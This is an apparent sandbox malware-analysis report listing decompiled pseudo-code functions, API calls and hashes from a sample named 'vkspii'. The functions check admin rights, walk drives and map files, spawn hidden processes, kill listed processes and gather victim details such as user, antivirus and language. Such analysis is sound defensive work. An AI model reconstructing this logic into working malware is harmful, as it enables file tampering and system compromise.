                                      0x0040686e
                                      0x0040687c
                                      0x00406890
                                      0x00406898
                                      0x004068a0
                                      0x004068a8
                                      0x004068b6
                                      0x004068cb
                                      0x004068db
                                      0x004068e3

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 00406859
                                      • wsprintfW.USER32 ref: 0040686E
                                      • InitializeCriticalSection.KERNEL32(?), ref: 0040687C
                                      • VirtualAlloc.KERNEL32 ref: 004068B0
                                        • Part of subcall function 004066F0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00406723
                                        • Part of subcall function 004066F0: lstrcatW.KERNEL32(00000000,00410364), ref: 0040673B
                                        • Part of subcall function 004066F0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00406745
                                      • VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 004068DB
                                      • ExitThread.KERNEL32 ref: 004068E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
                                      • String ID: %c:\
                                      • API String ID: 1988002015-3142399695
                                      • Opcode ID: 234e897b3db6d0822de12132551c07e096dda7dd2848727a29eb3a1be7f74770
                                      • Instruction ID: d88b45d10d8f236cef520cbec221070cd426d639c7b6d1ffd4d7ad39dfd3f75c
                                      • Opcode Fuzzy Hash: 234e897b3db6d0822de12132551c07e096dda7dd2848727a29eb3a1be7f74770
                                      • Instruction Fuzzy Hash: 800196B5244300BFE7109F50CD8EF577BA8AB84B14F004628FB65AD1E2D7B09904CB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 65%
                                      			E00403A60() {
                                      				signed int _v8;
                                      				void* _v12;
                                      				short _v16;
                                      				struct _SID_IDENTIFIER_AUTHORITY _v20;
                                      				int _t13;
                                      				_Unknown_base(*)()* _t15;
                                      				signed int _t16;
                                      
                                      				_v20.Value = 0;
                                      				_v16 = 0x500;
                                      				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                                      				if(_t13 != 0) {
                                      					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
                                      					_t5 =  &_v8; // 0x404a63
                                      					_t16 =  *_t15(0, _v12, _t5);
                                      					asm("sbb eax, eax");
                                      					_v8 = _v8 &  ~_t16;
                                      					FreeSid(_v12);
                                      					_t10 =  &_v8; // 0x404a63
                                      					return  *_t10;
                                      				} else {
                                      					return _t13;
                                      				}
                                      			}










                                      0x00403a69
                                      0x00403a89
                                      0x00403a90
                                      0x00403a98
                                      0x00403aaf
                                      0x00403ab5
                                      0x00403abe
                                      0x00403ac5
                                      0x00403ac7
                                      0x00403aca
                                      0x00403ad0
                                      0x00403ad6
                                      0x00403a9d
                                      0x00403a9d
                                      0x00403a9d

                                      APIs
                                      • AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00403A90
                                      • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 00403AA3
                                      • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00403AAF
                                      • FreeSid.ADVAPI32(?), ref: 00403ACA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressAllocateFreeHandleInitializeModuleProc
                                      • String ID: CheckTokenMembership$advapi32.dll$cJ@
                                      • API String ID: 3309497720-3398485638
                                      • Opcode ID: 4468bd7a1b991eef61b30ffc9688bd5fffe7c89f6fdc7d751bd3f5c612f6d095
                                      • Instruction ID: 33a1519f93ae69caf91dd4e42da6a452692d52d9b4e3223079b77a4f0d81269a
                                      • Opcode Fuzzy Hash: 4468bd7a1b991eef61b30ffc9688bd5fffe7c89f6fdc7d751bd3f5c612f6d095
                                      • Instruction Fuzzy Hash: D2F03C30A40209BBEB109BE0DD0EFADBB7CEB04705F1045A5FA04B62D1E6745A108B59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 85%
                                      			E00402890(WCHAR* __ecx, intOrPtr __edx) {
                                      				long _v8;
                                      				intOrPtr _v12;
                                      				void* _v16;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed int _t14;
                                      				void* _t18;
                                      				void* _t23;
                                      				WCHAR* _t29;
                                      				void* _t34;
                                      				signed int _t35;
                                      				long _t37;
                                      				void* _t38;
                                      				void* _t40;
                                      
                                      				_t29 = __ecx;
                                      				_t28 = 0;
                                      				_v12 = __edx;
                                      				_t34 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
                                      				if(_t34 == 0xffffffff) {
                                      					L3:
                                      					return 0;
                                      				} else {
                                      					_v8 = GetFileSize(_t34, 0);
                                      					E00403030(0, _t34, _t35);
                                      					asm("sbb esi, esi");
                                      					_t37 = (_t35 & 0x00000003) + 1;
                                      					_t14 = E00403030(0, _t34, _t37);
                                      					asm("sbb eax, eax");
                                      					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0);
                                      					_v16 = _t18;
                                      					if(_t18 != 0) {
                                      						_t38 = MapViewOfFile(_t18, _t37, 0, 0, 0);
                                      						if(_t38 != 0) {
                                      							_t23 = E00403030(0, _t34, _t38);
                                      							if(_t23 == 0) {
                                      								_push(_t29);
                                      								_t4 = _t38 + 0x53; // 0x53
                                      								_t29 = _t4;
                                      								_t5 = _t23 + 6; // 0x6
                                      								E00407DB0(_t29, _t5);
                                      								_t40 = _t40 + 4;
                                      							}
                                      							_push(_t29);
                                      							_t28 = E00402830(_v12, _t38, _v8);
                                      							UnmapViewOfFile(_t38);
                                      						}
                                      						CloseHandle(_v16);
                                      						CloseHandle(_t34);
                                      						return _t28;
                                      					} else {
                                      						CloseHandle(_t34);
                                      						goto L3;
                                      					}
                                      				}
                                      			}


















                                      0x00402890
                                      0x00402899
                                      0x0040289b
                                      0x004028b1
                                      0x004028b6
                                      0x004028f9
                                      0x00402901
                                      0x004028b8
                                      0x004028c0
                                      0x004028c3
                                      0x004028ca
                                      0x004028cf
                                      0x004028d0
                                      0x004028d8
                                      0x004028e5
                                      0x004028eb
                                      0x004028f0
                                      0x00402910
                                      0x00402914
                                      0x00402916
                                      0x0040291d
                                      0x0040291f
                                      0x00402920
                                      0x00402920
                                      0x00402923
                                      0x00402926
                                      0x0040292b
                                      0x0040292b
                                      0x0040292e
                                      0x0040293f
                                      0x00402942
                                      0x00402942
                                      0x00402951
                                      0x00402954
                                      0x0040295e
                                      0x004028f2
                                      0x004028f3
                                      0x00000000
                                      0x004028f3
                                      0x004028f0

                                      APIs
                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,74CF82B0,00000000,?,?,00402C02), ref: 004028AB
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,00402C02), ref: 004028BA
                                      • CreateFileMappingW.KERNEL32(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,00402C02), ref: 004028E5
                                      • CloseHandle.KERNEL32(00000000,?,?,00402C02), ref: 004028F3
                                      • MapViewOfFile.KERNEL32(00000000,74CF82B1,00000000,00000000,00000000,?,?,00402C02), ref: 0040290A
                                      • UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,00402C02), ref: 00402942
                                      • CloseHandle.KERNEL32(?,?,?,00402C02), ref: 00402951
                                      • CloseHandle.KERNEL32(00000000,?,?,00402C02), ref: 00402954
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreateView$MappingSizeUnmap
                                      • String ID:
                                      • API String ID: 265113797-0
                                      • Opcode ID: c3a6c9024250ff713cce5d39a0f05ce3fc450d2e8e024756add73c0ab4eb3eab
                                      • Instruction ID: c7753fadabc3ce0f8503889d90d66a1a67b62c86d4c9c93fbc6d336bdc04640e
                                      • Opcode Fuzzy Hash: c3a6c9024250ff713cce5d39a0f05ce3fc450d2e8e024756add73c0ab4eb3eab
                                      • Instruction Fuzzy Hash: 8A2134B2B011197FE7106B749D8AF7F7B6CEB45225F00423AFC01B22C1E6789D0045A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 97%
                                      			E004033E0(int* __ecx, void* __eflags, char _a4) {
                                      				int* _v8;
                                      				void* _t8;
                                      				char _t10;
                                      				void* _t14;
                                      				void* _t15;
                                      				char _t18;
                                      				char _t19;
                                      				int _t20;
                                      				CHAR* _t23;
                                      				CHAR* _t26;
                                      				CHAR* _t35;
                                      				CHAR* _t40;
                                      
                                      				_push(__ecx);
                                      				_t1 =  &_a4; // 0x405135
                                      				_t26 =  *_t1;
                                      				_t37 = __ecx;
                                      				_v8 = __ecx;
                                      				__ecx[3] = _t26;
                                      				_t8 = E004032B0(__ecx);
                                      				if(_t8 == 0 || _t8 == 0xffffffff) {
                                      					ExitProcess(0);
                                      				}
                                      				if(E00403320(__ecx) == 0) {
                                      					 *__ecx = 0;
                                      					_t10 =  *_t26;
                                      					if(_t10 == 0) {
                                      						goto L4;
                                      					} else {
                                      						do {
                                      							if(_t10 == 0x7b) {
                                      								_t26 =  &(_t26[1]);
                                      								_t14 = E00403190(_t26);
                                      								if(_t14 != 0) {
                                      									_t15 = _t14 - 1;
                                      									if(_t15 == 0) {
                                      										E00403200(_t37, _t26, 1);
                                      									} else {
                                      										if(_t15 == 1) {
                                      											_t18 =  *_t26;
                                      											_t35 = _t26;
                                      											if(_t18 == 0) {
                                      												L15:
                                      												_t19 =  *_t35;
                                      												if(_t19 != 0x7d) {
                                      													_t40 = _t35;
                                      													if(_t19 != 0) {
                                      														while( *_t40 != 0x7d) {
                                      															_t40 =  &(_t40[1]);
                                      															if( *_t40 != 0) {
                                      																continue;
                                      															} else {
                                      															}
                                      															goto L21;
                                      														}
                                      														 *_t40 = 0;
                                      													}
                                      													L21:
                                      													_t20 = lstrlenA(_t35);
                                      													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
                                      													 *(_v8 + 8) = _t23;
                                      													if(_t23 != 0) {
                                      														lstrcpyA(_t23, _t35);
                                      													}
                                      													 *_t40 = 0x7d;
                                      													_t37 = _v8;
                                      												}
                                      											} else {
                                      												while(_t18 != 0x7d) {
                                      													_t35 =  &(_t35[1]);
                                      													if(_t18 == 0x3d) {
                                      														goto L15;
                                      													} else {
                                      														_t18 =  *_t35;
                                      														if(_t18 != 0) {
                                      															continue;
                                      														} else {
                                      															goto L15;
                                      														}
                                      													}
                                      													goto L25;
                                      												}
                                      											}
                                      										}
                                      									}
                                      								}
                                      							}
                                      							L25:
                                      							_t10 = _t26[1];
                                      							_t26 =  &(_t26[1]);
                                      						} while (_t10 != 0);
                                      						return 1;
                                      					}
                                      				} else {
                                      					 *__ecx = 1;
                                      					L4:
                                      					return 1;
                                      				}
                                      			}















                                      0x004033e3
                                      0x004033e5
                                      0x004033e5
                                      0x004033e9
                                      0x004033eb
                                      0x004033ee
                                      0x004033f1
                                      0x004033f8
                                      0x004034db
                                      0x004034db
                                      0x00403410
                                      0x00403425
                                      0x0040342b
                                      0x0040342f
                                      0x00000000
                                      0x00403431
                                      0x00403432
                                      0x00403434
                                      0x0040343a
                                      0x00403441
                                      0x00403444
                                      0x0040344a
                                      0x0040344b
                                      0x004034ba
                                      0x0040344d
                                      0x0040344e
                                      0x00403450
                                      0x00403452
                                      0x00403456
                                      0x00403467
                                      0x00403467
                                      0x0040346b
                                      0x0040346d
                                      0x00403471
                                      0x00403473
                                      0x00403478
                                      0x0040347c
                                      0x00000000
                                      0x00000000
                                      0x0040347e
                                      0x00000000
                                      0x0040347c
                                      0x00403480
                                      0x00403480
                                      0x00403483
                                      0x00403484
                                      0x00403495
                                      0x0040349e
                                      0x004034a3
                                      0x004034a7
                                      0x004034a7
                                      0x004034ad
                                      0x004034b0
                                      0x004034b0
                                      0x00000000
                                      0x00403458
                                      0x0040345c
                                      0x0040345f
                                      0x00000000
                                      0x00403461
                                      0x00403461
                                      0x00403465
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00403465
                                      0x00000000
                                      0x0040345f
                                      0x00403458
                                      0x00403456
                                      0x0040344e
                                      0x0040344b
                                      0x00403444
                                      0x004034bf
                                      0x004034bf
                                      0x004034c2
                                      0x004034c3
                                      0x004034d6
                                      0x004034d6
                                      0x00403412
                                      0x00403412
                                      0x00403418
                                      0x00403422
                                      0x00403422

                                      APIs
                                        • Part of subcall function 004032B0: lstrlenA.KERNEL32(?,00000000,?,5Q@,?,?,004033F6,?,74CB66A0,?,?,00405135,00000000), ref: 004032C5
                                        • Part of subcall function 004032B0: lstrlenA.KERNEL32(?,?,004033F6,?,74CB66A0,?,?,00405135,00000000), ref: 004032EE
                                      • lstrlenA.KERNEL32(5Q@,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403484
                                      • GetProcessHeap.KERNEL32(00000008,00000001,?,00405135,00000000), ref: 0040348E
                                      • HeapAlloc.KERNEL32(00000000,?,00405135,00000000), ref: 00403495
                                      • lstrcpyA.KERNEL32(00000000,5Q@,?,00405135,00000000), ref: 004034A7
                                      • ExitProcess.KERNEL32 ref: 004034DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$HeapProcess$AllocExitlstrcpy
                                      • String ID: 5Q@
                                      • API String ID: 1867342102-144561132
                                      • Opcode ID: 21661da1c7e2a165306f5dc85369bd9d986d501ed5d2751d7a9df859c23e26cf
                                      • Instruction ID: a602f992c252cea2a24e073b1cce2c09e2fd92cb4485f691b182cac4319fe13f
                                      • Opcode Fuzzy Hash: 21661da1c7e2a165306f5dc85369bd9d986d501ed5d2751d7a9df859c23e26cf
                                      • Instruction Fuzzy Hash: BA31E3305042455AEB265F289C447B77FAC9B06312F1841BBE8C5BF3C2D67D4E4787A9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 84%
                                      			E00402C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                      				struct tagPAINTSTRUCT _v68;
                                      				struct tagPAINTSTRUCT _v88;
                                      				short _v100;
                                      				intOrPtr _t13;
                                      				void* _t15;
                                      				struct HDC__* _t21;
                                      				int _t30;
                                      
                                      				_t13 =  *0x40e290; // 0x21
                                      				asm("movdqu xmm0, [0x40e280]");
                                      				_t30 = _a8;
                                      				_v88.fErase = _t13;
                                      				asm("movdqu [esp+0x10], xmm0");
                                      				_t15 = _t30 - 2;
                                      				if(_t15 == 0) {
                                      					CreateThread(0, 0, E00402AD0, 0, 0, 0);
                                      					DestroyWindow(_a4);
                                      					return 0xdeadbeef;
                                      				} else {
                                      					if(_t15 == 0xd) {
                                      						_t21 = BeginPaint(_a4,  &_v68);
                                      						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
                                      						EndPaint(_a4,  &_v88);
                                      						return 0;
                                      					} else {
                                      						return DefWindowProcW(_a4, _t30, _a12, _a16);
                                      					}
                                      				}
                                      			}










                                      0x00402c59
                                      0x00402c5e
                                      0x00402c66
                                      0x00402c69
                                      0x00402c70
                                      0x00402c76
                                      0x00402c79
                                      0x00402ce9
                                      0x00402cf2
                                      0x00402d01
                                      0x00402c7b
                                      0x00402c7e
                                      0x00402c9f
                                      0x00402cbd
                                      0x00402ccb
                                      0x00402cd7
                                      0x00402c80
                                      0x00402c94
                                      0x00402c94
                                      0x00402c7e

                                      APIs
                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00402C8A
                                      • BeginPaint.USER32(?,?), ref: 00402C9F
                                      • lstrlenW.KERNEL32(?), ref: 00402CAC
                                      • TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 00402CBD
                                      • EndPaint.USER32(?,?), ref: 00402CCB
                                      • CreateThread.KERNEL32 ref: 00402CE9
                                      • DestroyWindow.USER32(?), ref: 00402CF2
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
                                      • String ID:
                                      • API String ID: 572880375-0
                                      • Opcode ID: c81bb7d4f7cc3b0479ad99f25df51467dc5e8c815c493290e282321582db75ec
                                      • Instruction ID: 316be470bdb16b495eaa6a8a4de42634492684a59cc3721c0e018fd81b09cf01
                                      • Opcode Fuzzy Hash: c81bb7d4f7cc3b0479ad99f25df51467dc5e8c815c493290e282321582db75ec
                                      • Instruction Fuzzy Hash: D5116332604209ABE711DF54EE0DFAA7B6CFB48311F000626FD45E91E1E7B19D24DB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 84%
                                      			E00404B10(WCHAR* __ecx) {
                                      				struct _PROCESS_INFORMATION _v20;
                                      				struct _STARTUPINFOW _v92;
                                      				intOrPtr _t15;
                                      				intOrPtr _t16;
                                      				WCHAR* _t25;
                                      
                                      				asm("xorps xmm0, xmm0");
                                      				_t25 = __ecx;
                                      				asm("movdqu [ebp-0x10], xmm0");
                                      				E00408B30( &_v92, 0, 0x44);
                                      				_t15 =  *0x412b0c; // 0x55c
                                      				_v92.hStdError = _t15;
                                      				_v92.hStdOutput = _t15;
                                      				_t16 =  *0x412b08; // 0x558
                                      				_v92.dwFlags = _v92.dwFlags | 0x00000101;
                                      				_v92.hStdInput = _t16;
                                      				_v92.wShowWindow = 0;
                                      				_v92.cb = 0x44;
                                      				if(CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20) != 0) {
                                      					CloseHandle(_v20);
                                      					return CloseHandle(_v20.hThread);
                                      				} else {
                                      					return GetLastError();
                                      				}
                                      			}








                                      0x00404b1c
                                      0x00404b22
                                      0x00404b24
                                      0x00404b29
                                      0x00404b2e
                                      0x00404b36
                                      0x00404b39
                                      0x00404b3c
                                      0x00404b41
                                      0x00404b48
                                      0x00404b4d
                                      0x00404b58
                                      0x00404b77
                                      0x00404b8d
                                      0x00404b98
                                      0x00404b79
                                      0x00404b83
                                      0x00404b83

                                      APIs
                                      • _memset.LIBCMT ref: 00404B29
                                      • CreateProcessW.KERNEL32 ref: 00404B6F
                                      • GetLastError.KERNEL32(?,?,00000000), ref: 00404B79
                                      • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00404B8D
                                      • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00404B92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$CreateErrorLastProcess_memset
                                      • String ID: D
                                      • API String ID: 1393943095-2746444292
                                      • Opcode ID: 61a65e664a15e54d92a6dad92bb0d9419f95a51cc1df3f98730657d9a343b283
                                      • Instruction ID: c9167ab5344422c8a44933cba82276f3a3bd4aa998c81f02b44ccbb638d81527
                                      • Opcode Fuzzy Hash: 61a65e664a15e54d92a6dad92bb0d9419f95a51cc1df3f98730657d9a343b283
                                      • Instruction Fuzzy Hash: E3014471E40319ABDB10DFA4DC46BDE7BB8EF04714F104226FA08FA190E7B569548B98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004047F8(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
                                      				int _t8;
                                      				int _t9;
                                      				void* _t15;
                                      				WCHAR* _t17;
                                      				void* _t18;
                                      				signed int _t23;
                                      				void* _t24;
                                      				void* _t28;
                                      
                                      				_t17 = __ecx;
                                      				_t15 = __ebx;
                                      				while(1) {
                                      					L2:
                                      					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
                                      					if(_t8 == 0) {
                                      						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
                                      						if(_t18 != 0) {
                                      							TerminateProcess(_t18, 0);
                                      							CloseHandle(_t18);
                                      						}
                                      					}
                                      					_t23 = _t23 + 1;
                                      					_t5 = _t15 + 0x24; // 0x24
                                      					_t17 = _t5;
                                      					if(_t23 < 0x27) {
                                      						continue;
                                      					}
                                      					L7:
                                      					_t24 = _a12;
                                      					_t9 = Process32NextW(_t24, _t15);
                                      					_t7 = _t15 + 0x24; // 0x24
                                      					_t17 = _t7;
                                      					if(_t9 != 0) {
                                      						_t23 = 0;
                                      						do {
                                      							goto L2;
                                      						} while (_t23 < 0x27);
                                      						goto L7;
                                      					}
                                      					if(_t15 != 0) {
                                      						VirtualFree(_t15, 0, 0x8000);
                                      					}
                                      					return CloseHandle(_t24);
                                      					L2:
                                      					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
                                      					if(_t8 == 0) {
                                      						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
                                      						if(_t18 != 0) {
                                      							TerminateProcess(_t18, 0);
                                      							CloseHandle(_t18);
                                      						}
                                      					}
                                      					_t23 = _t23 + 1;
                                      					_t5 = _t15 + 0x24; // 0x24
                                      					_t17 = _t5;
                                      				}
                                      			}











                                      0x004047f8
                                      0x004047f8
                                      0x00404800
                                      0x00404800
                                      0x00404805
                                      0x0040480d
                                      0x0040481b
                                      0x0040481f
                                      0x00404824
                                      0x00404831
                                      0x00404831
                                      0x0040481f
                                      0x0040483b
                                      0x0040483c
                                      0x0040483c
                                      0x00404842
                                      0x00000000
                                      0x00000000
                                      0x00404844
                                      0x00404844
                                      0x0040484a
                                      0x00404850
                                      0x00404850
                                      0x00404855
                                      0x004047f4
                                      0x00404800
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404800
                                      0x00404859
                                      0x00404863
                                      0x00404863
                                      0x00404872
                                      0x00404800
                                      0x00404805
                                      0x0040480d
                                      0x0040481b
                                      0x0040481f
                                      0x00404824
                                      0x00404831
                                      0x00404831
                                      0x0040481f
                                      0x0040483b
                                      0x0040483c
                                      0x0040483c
                                      0x0040483f

                                      APIs
                                      • lstrcmpiW.KERNEL32(00000002,00000024), ref: 00404805
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00404815
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00404824
                                      • CloseHandle.KERNEL32(00000000), ref: 00404831
                                      • Process32NextW.KERNEL32(?,00000000), ref: 0040484A
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404863
                                      • CloseHandle.KERNEL32(?), ref: 0040486A
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcess$FreeNextOpenProcess32TerminateVirtuallstrcmpi
                                      • String ID:
                                      • API String ID: 999196985-0
                                      • Opcode ID: 96ca63748bec8ddf27f1aab28855f42674f0454dc6f50e2837a6c1d9c7404263
                                      • Instruction ID: 1a13c8a93cbec1d8c6bc579d8d4bacd9a5b995379d62742e90ee94b5f9f4cf80
                                      • Opcode Fuzzy Hash: 96ca63748bec8ddf27f1aab28855f42674f0454dc6f50e2837a6c1d9c7404263
                                      • Instruction Fuzzy Hash: 7E01D6B7200111ABEB102F10AD48B6B7368EBD5301F104435FF49B61A1EB759C05CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004039B0(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a28, intOrPtr _a36, intOrPtr _a44, intOrPtr _a52, intOrPtr _a60, intOrPtr _a76, intOrPtr _a84) {
                                      				intOrPtr* _t44;
                                      
                                      				_t44 = __ecx;
                                      				 *__ecx = _a4;
                                      				 *((intOrPtr*)(__ecx + 0xc)) = _a12;
                                      				 *((intOrPtr*)(__ecx + 0x24)) = _a28;
                                      				 *((intOrPtr*)(__ecx + 0x30)) = _a36;
                                      				 *((intOrPtr*)(__ecx + 0x3c)) = _a44;
                                      				 *((intOrPtr*)(__ecx + 0x48)) = _a52;
                                      				 *((intOrPtr*)(__ecx + 0x54)) = _a60;
                                      				 *((intOrPtr*)(__ecx + 0x74)) = _a76;
                                      				 *(__ecx + 4) = L"pc_user";
                                      				 *(__ecx + 0x10) = L"pc_name";
                                      				 *((intOrPtr*)(__ecx + 0x18)) = 1;
                                      				 *(__ecx + 0x1c) = L"pc_group";
                                      				 *(__ecx + 0x28) = L"av";
                                      				 *(__ecx + 0x34) = L"pc_lang";
                                      				 *(__ecx + 0x40) = L"pc_keyb";
                                      				 *(__ecx + 0x4c) = L"os_major";
                                      				 *(__ecx + 0x58) = L"os_bit";
                                      				 *((intOrPtr*)(__ecx + 0x60)) = 1;
